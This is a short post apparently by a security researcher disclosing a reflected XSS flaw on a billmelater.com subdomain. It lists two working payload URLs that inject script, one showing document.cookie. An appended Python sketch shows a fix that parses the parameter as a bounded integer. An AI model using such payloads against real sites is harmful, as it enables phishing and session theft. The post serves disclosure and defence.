Hi, some days ago I found an XSS bug in PayPal services but was not eligible to get the bounty. Well, no worries, I will try again :D
It was a subdomain of billmelater.com.
The bug can be used for phishing attacks, etc.
Domain: http://wwwb.search.billmelater.com
They are getting an integer value from the GET field and using it as the time to redirect you to other pages.
Vulnerable links:
http://wwwb.search.billmelater.com/coupons/store/guess/?u='"--></style></script><script>alert(document.cookie)</script>
http://wwwb.search.billmelater.com/coupons/store/guess/?u='"--></style></script><script>alert("XSS by Saadat")</script>
ScreenShot
So this is for today :)
#IndependentPakistaniSecurityResearcher
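Added example, not part of the original post and not the site's actual code: a sketch of the fix for this bug class, where the `u` value is parsed as a bounded integer before it reaches the page. The template, the inline-script context, the host name, and the default and maximum delays are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Hypothetical page template: the delay lands inside an inline script,
# a context the reported payload's closing </script> would break out of.
TEMPLATE = (
    "<html><head><script>"
    "setTimeout(function () {{ location.href = '/coupons/'; }}, {delay} * 1000);"
    "</script></head><body>Redirecting...</body></html>"
)

DEFAULT_DELAY = 5   # seconds (assumed)
MAX_DELAY = 60      # seconds (assumed upper bound)

# Constructed request: placeholder host, path and payload as reported in the post.
SAMPLE_URL = (
    "http://shop.example.test/coupons/store/guess/"
    "?u='\"--></style></script><script>alert(document.cookie)</script>"
)


def get_param(url, name):
    """Return the first decoded value of a query parameter, or ''."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get(name, [""])[0]


def render_vulnerable(url):
    """Before: the raw parameter is formatted straight into the page."""
    return TEMPLATE.format(delay=get_param(url, "u"))


def parse_delay(raw):
    """Accept only 1-3 ASCII digits; anything else falls back to the default."""
    if re.fullmatch(r"[0-9]{1,3}", raw) is None:
        return DEFAULT_DELAY
    return min(int(raw), MAX_DELAY)


def render_hardened(url):
    """After: the value is an int before it ever reaches the template."""
    return TEMPLATE.format(delay=parse_delay(get_param(url, "u")))


if __name__ == "__main__":
    print("payload reflected (before):", "<script>alert(" in render_vulnerable(SAMPLE_URL))
    print("payload reflected (after): ", "<script>alert(" in render_hardened(SAMPLE_URL))
```

Because the field is meant to hold a number, strict parsing on input removes the need to pick the right output encoding for each context the value is written into.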